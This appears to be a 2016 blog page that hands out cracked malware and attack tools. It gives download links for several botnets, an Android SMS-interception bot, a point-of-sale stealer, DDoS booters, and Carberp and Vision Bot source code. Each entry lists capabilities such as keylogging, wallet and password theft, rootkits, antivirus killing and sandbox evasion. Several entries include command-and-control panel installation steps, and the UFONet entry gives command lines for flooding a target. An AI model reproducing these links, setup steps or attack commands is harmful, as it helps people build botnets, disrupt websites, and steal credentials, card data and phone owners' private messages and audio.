Monday, 28 March 2016

Neutrino HTTP DDoS Botnet [Cracked by 0x22 & Lostit]




Neutrino Bot 

- The main functional 
* HTTP (S) flood (methods GET \ POST) 
* Smart DDoS
* AntiDDOS flood (Emulation js \ cookies) 
* Slowloris flood 
* Download flood 
* TCP flood 
* UDP flood 


* Loader (exe, dll, vbs, bat ... + can specify parameters for running the file) 
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window) 
* Command shell (remote command execution using shell windows) 
* Stealing files by mask (eg bitcoin wallets) 
* Launch the browser with one of these links (aka Cheaters views) 
* Spoofing Hosts 
* Stilling Win keys 
* Reproduction (USB \ Archive) 
* Purity downloads (number found "neighbors" on the computer) 
* Identifying the installed AV (on all Windows except Server) 
* Update 
* Work through the gasket 

- Additional Features 
* Anti debugging 
* AntiVM 
* Detect sandboxes 
* Detect all online services automatic analysis 
* BotKiller 

* Bot protection (protection process \ file \ registry branches) 
* Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others) 
* Unlimited number of backup domain 
* Quiet operation even under a limited account 
* Do not load the CPU 

- Functional admin 
* Flexible system for creating jobs 
* Detailed statistics for bots 
* Ability to give commands to each country separately or bot 
* Customizable otstuk bots 
* Sort bots in Articles IP \ Live \ Country \ OS 
* System Bans. 

- Weight uncompressed binary file ~ 50kb (PL - C) 
- Boat tested on the entire line of Windows, from XP to 8.1 (x32/64)

Download :
https://mega.nz/#!TYtWgL4J
!ncpizlqEBKU_vcJnpzMznxiA9g-JRMbyXk89FW_RqM4
https://mega.nz/#!TYtWgL4J!ncpizlqEBKU_vcJnpzMznxiA9g-JRMbyXk89FW_RqM4



[Update]Gaudox - HTTP Bot (1.1.0.1) | C++/ASM|Ring3 Rootkit | Watchdog |Antis |Stable

[Update]Gaudox - HTTP Bot (1.1.0.1) | C++/ASM|Ring3 Rootkit | Watchdog |Antis |Stable

Gaudox HTTP


Gaudox is a HTTP loader completely coded from scratch in C/C++ language with a few lines of Assembly, which means that it does not require of any dependencies ( C-Runtime, NET Framework, Java VM ). The bot has been fully tested and working on all Windows versions from Windows XP SP2 to Windows 10 (32/64-bit). It is also worth mentioning that I coded this bot with very efficient and stable designed code to handle thousands of connections at once.

Features:

Usermode Rootkit
Bot has Rootkit functionality which hides all bot resources and prevents from being accessed from explorer process. This feature does not drop any to disk, the code is internally embedded in the bot file and injected in the target process from memory. It is also has self-protection that prevents the hooks from being removed by third-party programs or any security tool. This feature is currently working on 32-bit systems.

Persistence/Watchdog
Bot prevents it from being removed from the system by bot killers, security tools or user actions. This feature is currently supporting process protection and working on both 32/64-bit systems but its maximum compatibility is in 32-bit.

Traffic Encrypted
The communication between the bot and the control panel is obfuscated. This prevents middle attacks.

Anti-Analysis/Research
Bot contains several methods for preventing from being analyzed by researchers or unauthorized users. some methods are from preventing static analysis by obfuscating code, data up to detect the presence of debuggers, avoid running the bot in virtualized environments, etc. some methods may not be mentioned.

Commands:

[+] Download and execute (Drop&Exec)
[+] Visit Website (Visible)
[+] Update Client
[+] Uninstall Client


Panel











How to install:
1) Open the Builder and create a new profile, you will use these values KEY #1 and KEY #2 in the panel.
2) Create a new database (recommended)
2) Open setup.php with browser and complete the form.
3) Delete setup.php and open login.php with browser.
5) When creating the bot clients do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel.

Code:
Bot

* Fixed issue with Uninstall command
* Anti-Virtual machine methods have been enabled

Panel

* Fixed issue with location
* Added captcha in login page
Download

Wednesday, 17 February 2016

Gaudox v1.1.0.0 - HTTP bot | C & ASM, 36kb











- Ring3 Rootkit
Includes Rootkit functionality, which hides all of its components from explorer process.
also worth mentioning that the rootkit prevents from being removed from the system and it's not implemented as a separate file so the bot will not write any file to the harddisk.
this feature is currently working only in 32-bit versions (XP-8.1).

- Persistence/Watchdog
This prevents it from being removed from the system by ensuring that the process is always running on the system.
Maximum compatibility of this feature is when the bot runs with administrator privileges.

- Traffic encrypted
The communication between the bot and the web panel is now encrypted.

- Web panel recoded
The panel has been completely recoded using PDO which makes it safer preventing SQL injection and other attacks.



How to install:
1) Open the builder and create a new profile, you will use these values Key1 and Key2 in the panel.
2) Create a database
2) Open setup.php
3) After installing go to login.php, delete setup.php
5) When creating the bot clients, do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel. 


Download : https://mega.nz/#!2QMjmBYL!OG0uazcKEIIcGTeY3JJdI_L__EAkxKKpsWmhsSosUB8

SmsBot Android Botnet




Features:
-Grabing all information about the victim (Phone Number, ICCID, IMEI, IMSI, Model, OS)
- Interception of incoming SMS messages and sending them to the web-panel and the control room.
- Call forwarding to any number
- Grabing all incoming and outgoing SMS
- Grabing all incoming and outgoing calls
- Record audio, sending it to the server (know what is happening around)
- Sending SMS to any room without the owner's knowledge

The apk work but the panel seems to have some problems. Bots are not showed.
The infected phone connect right to the panel, i know it because there are two folder created named with the imei number of the infected phone (in /sound and /listing) but nothing inside these folders and nothing inside the database...
Maybe that someone here make it working.

Let me know if you need help for decompil the apk changing the host, etc... then recompil it.

Note: At the first line of each php files of the admin panel change '<?' to '<?php' otherwise it will not work. (on many hosting, xampp included)

DOwnload :https://mega.nz/#!GZkzXbDK!Mcla-lIb-FbfNpd5ujiOAS9HHPW6aNNAsIA4eVhl0Yc

Friday, 5 February 2016

JackPOS Stealer

JackPOS Stealer



Download https://mega.nz/#!jN0SHBQZ!JH_FgAWNkMe9nfNcl4GRNZujZc3IUOhi1w80An0iGUI

Most Security Booter

Most Security Booter




Download https://mega.nz/#!GEU3TbLK!9SLo-z-JeJp3VRbPrHEsj5eprdj3GElGmh5DwcNjT04

FloristBooter 3.3

loristBooter 3.3

Feature:

[~]Added a skype Resolver to the Resolve page
[~]Added option to add your own shells to increase your boot
power.
[~]A counter checks how many shells you have added. Does
not check if the shells are working yet
[~]Improved the design of the booter (No random buttons
everywhere)
[~]Fixed the Geolocate system to make it simple
[~]Made the general feel sleeker and less clunky.
[~]Slight changes to the status page
[~]Increased the power quite significantly.
[~]Removed some minor features I felt didn't have a place.

Virus Scan Report:
Código:
https://www.virustotal.com/file/86430beda747b2bc9ce5679f656c51bda962dd3454b1a6a3d797eb7105277da8/analysis/


Download https://mega.nz/#!PJkH1bqQ!pNvLoD2U2KZZW7iTDEct9AeNT77s7A58TvU7kIozISs

Shrek Booter | Shell / API Booter | Many Layers

Shrek Booter | Shell / API Booter | Many Layers


Download https://mega.nz/#!GM1m1brI!JIPKvAwrEkm74tufYHce1KViGAbqw2-u4UNI_0cA_Ts

Orion HTTP Booter

Features:
- Unique HTTP flooding technique
- Hits down most privately hosted webservers
- Nice GUI
- Saves URL's
- Customizable time limit
- Customizable thread limit
- Updated frequently


Download https://mega.nz/#!vBlDzSYL!5DJQZvzRYiFrihPHugfezPZ8YQ7WIZbzozRvaztNd6I

Source Carberp

Source Carberp


Download https://mega.nz/#!qZdBFD7L!MQ976n4OVHVwWKoHRDp4-WiJHJkf5HzKWXyMLTWTWiA

source Vision Bot

Vision Bot 


Download https://mega.nz/#!TUl2QZjI!Ubu06lVWJ0Q06LOeHEGXdiS_d7QOSCvdlF40mRbG0Bs

Spy-1218 [ web rar ]

install >>
1.import db to mysql
2.edited config.php
3.edited | admin/check.php >> $password
4.login to admin

Download https://mega.nz/#!GBlj3RQJ!ZxqKww2q50bYrHe4qgZ_etu8XXW95A-QeDPRh1vInlc


Blackout Botnet V2

1. Uploade alle Dateien aus diesem Ordner in den Pfad deines BlackOut Botpanels.
2. Setze CHMOD 777 für die Datei ip.php (Dateiberechtigung).

1. Upload all files in this folder to the path of your BlackOut botpanel.
2. Set CHMOD 777 for the file ip.php

Visit FREETROJANBOTNET.COM for more informations

0a34e53ca751de62bc16da2c0812440e  Builder.exe
f98a46d0d6b6a386e1920cabeef3f7d9  AxInterop.WMPLib.dll
55ec056cfeaced0e213961149d766d01  Interop.WMPLib.dll
Upload panel to your server
Upload online stats plugin
Create DB using blackout.sql
Set correct settings
Crypt your bot

Download https://mega.nz/#!XVtXHIBC!7GaHzmUbJLHJKUsrHL--7BtxWAoFhPlm32gxwMe6USw

Gorynch / DiamondFox Cracked Builder + Panel

Gorynch / DiamondFox Cracked Builder + Panel
Bot updates released date: June 18th 2015
- Cracked date: June 23rd 2015
- Bot Update log ver: 4.2.0.302
- Protection: VMProtect
- Builder language: VB6 P-Code
- MD5: BD0BB7537EA45B477B0F8E1B400003BF
Credits: ToW / The old Warrior

Functions:
Download and execute (in memory)
Download and execute (on disk)
Open website (Visible)
Open website (Hidden)
UDP Flood
HTTP Flood
Enable / Disable Host Editor
Enable / Disable PoS Grabber
Spam with bots (inbox)
Bitcoin Wallet Stealer
Facebook / Twitter Message spread
Firefox homepage changer
Enable / Disable Keylogger
Take screenshot
Password Grabber (Chorme, Firefox, Opera, IExplore, Safari)
FTP Grabber (Filezilla)
Instant Messaging Password Grabber
Grab EMAIL, SMTP, POP3 and IMAP
Update bot
Uninstall

Builder Options:
Fallback panel.
Custom Connection time.
Encrypted connections.
Encrypted data inside the bot.
Custom User-agent.
Anti-Sysanalizer.
Anti-VirtualBox.
Anti-VMWare.
Anti-Anubis.
Anti-OllyDBG.
Disable Regedit.
Anti-Sandboxie.
Anti-Norman.
Anti-Researchers.
Anti-Malwr.com.
Anti-Wine.
Disable Taskmanager.
USB Spread.
Spread Dropbox.
File Extention Selector
User Acount Control Forcer.
Custom install name
Custom install path
HKCU startup method
Winlogon startup method
Startup folder method
Optional melt function
Startup persistance
Automatic keylogger installation
Automatic Point-Of-Sales grabber installation
Automatic grabbers routine

Extra Info:
Very stable connection.
Random Access Memory plugins execution
Works with any crypter.
Lite Ring3 RootKit (Hide registry keys).
No need dependencies.
Detect IP, country, antivirus, firewall, cpu, gpu, ram, memory, disk, user, PC name, hwid, software architecture and status.
Ability to send individual commands for each bot.
Ability to select the bots by country, status, by type or all.
Statistics. (Map, reports, status, operating system, host status, keylogger status, PoS status, System Architecture, antivirus and firewall)
Real-time Connection Notifications.
Communication between the bot and the panel are encrypted.
Spam is made for bots, not by the webpanel.
Based on plugins so more features will be added in the future.
Working on all OS. (XP, vista, 7, 8, 8.1) (We are starting support for Windows X)


Download https://mega.nz/#!yYkX1TJQ!Dd3FxBmjXdB6TVpnDw4s0kr2n3Bgxuzusw0dVx7Rrjo

ufonet v0.5 b

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet.

Features :
– Auto-update
– Clean code (only needs python-pycurl)
– Documentation with examples
– Web/GUI Interface
– Proxy to connect to ‘zombies’ (ex: tor)
– Change HTTP Headers (User-Agent, Referer, Host…)
– Configure requests (Timeout, Retries, Delay…)
– Search for ‘zombies’ on google results (using a pattern or a list of dorks)
– Test ‘Open Redirect’ vulnerabilities on ‘zombies’
– Download/Upload ‘zombies’ from Community
– Inspect a target (HTML objects sizes)
– Set a place to ‘bit’ on a target (ex: big file)
– Control number of rounds to attack
– Apply cache evasion techniques


Installing:
UFONet runs on many platforms. It requires Python and the following library:
— python-pycurl – Python bindings to libcurl
On Debian-based systems (ex: Ubuntu), run:
— sudo apt-get install python-pycurl
Source libs: Python | PyCurl

Attacking a target:
Enter a target to attack, with the number of rounds that will be attacked:
./ufonet -a http://target.com -r 10This will attack the target, with the list of ‘zombies’ that your provided on: “zombies.txt”, a number of 10 times for each ‘zombie’. That means, that if you have a list of 1.000 ‘zombies’,
the program will launch 1.000 ‘zombies’ x 10 rounds = 10.000 ‘hits’ to the target.
::By default, if you don’t put any round, it will apply only 1. ::
Additionally, you can choose a place to recharge on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems,
this will do the attack more effective.
Testing botnet:
Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’. Urls of the ‘zombies’ should be like this: http://target.com/check?uri=
After that, launch it:
./ufonet -t zombies.txt
At the end of the process, you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your file: zombies.txt will be updated.


Download https://mega.nz/#!6MMjHQLY!-R7K7uZGx1nRMnw2e_DIBLQuZrWNb0wVGQkeCilST1k

Loadhttp Botnet

Loadhttp Botnet
Bot Feature List:

HTTP bot (communication encrypted using a modified standard encryption algorithm and use of static and dynamic passed around keys)
Coded in C++ (no dependencies other than Windows, no use of CRT, supports unicode/all language characters)
DNS resolving bypasses HOSTS file
Safemode startup ability
Startup with elevation retention (starts up with previously obtained elevated rights)
User-mode rootkit
Persistence and protection of registry key, file, and process
Hides file and startup also not visible in msconfig
Anti-Virus killer (supports 31 security solutions covering 95%+ of the AV market)
Anti-Malware/Botkiller (disables or kills the majority of all malware, even those notorious for being extremely resistant to
tampering. scans heuristically)
Privilege escalation through social engineering
Visit website visible or hidden
Execute shell command visible or hidden
Download & Update (options to confirm with MD5 hash, execute file with commandline arguments, save to specific location)
Uninstallation (gets rid of startup, installed file/directory, executed file, registry keys that hold bot data, and optionally scans
the entire system for any file that matches the MD5 of the currently executed file for deletion)
Disable system restore and delete any old restoration points
Disable Windows Firewall
Disable Windows Update
Detection of shutdown and logoff
Preventing of going into stand-by mode
Support for unlimited domains in configuration
Change homepages on Internet Explorer, Mozilla Firefox, and Google Chrome
Whenever files are deleted by the bot, the memory is freed (safe-delete, a.k.a. data is unrecoverable)
Command&Control Panel is secure from any web-hacking and query injections. supports multi-user management
Proactive AV settings bypasses
CloudFlare support in the Control Panel
~44kb file size
Handling of own Zone.Identifier stream without dampening of optimal internet settings as some other bots do
Additional process persistence via injected watchdog threads
Ability to send a list of download links and have the links be randomly chosen for download or update


Control Panel Feature List:

Captcha on login page prevents any bruteforce attack attempts
Control Panel endured a security audit done by a team of experienced web-vulnerability professionals, you are guaranteed to be hack-safe
Highly detailed information and statistics displayed and stored about your bot network
Detailed displayed commands
Highly modifyable commands: you can pause, restart, and delete commands. You can modify command filters extensively.
Password changing ability
Ability to optionally use a loginpage-URL-key to prevent and discourage panel sniffing attempts
Modifyable bot communication settings
User management page has broad functionality for adding and removing other users, controlling user privileges and seeing how active they have been
There is a page for conveniently viewing the foreground window activity of bots
The control panel is compatible with all recent versions of PHP and MySQL

Panel Setup:
------------
1) Upload all of the files to a webserver at the correct path.
2) Create a Mysql database and note the host, username, password, and db name.
3) In phpmyadmin, navigate to "Import" and select DATABASE.sql from this directory, then upload it.
4) Open up the file CONFIGURATION.php. Input your database credentials and encryption key.
    (You should have been provided with the encryption key)
5) Navigate to the /login/ page and log in with the credentials Admin:change_me
6) Once in the panel, go to the Preferences page and change your password.
7) Use the login page key feature available in Preferences for your security as well.
    (You visit your login page like: http://panel.net/path/login/?key=1234)
8) You should be able to administer bots and control them through commands now.
9) Now that panel setup is complete, delete or move this file and DATABASE.sql from the webserver.
    (This is important)


Download https://mega.nz/#!SV91EYRa!FAEdWqKRHrlfIbQWzAJA-nCSNPGh6lVGCKNYP416IMQ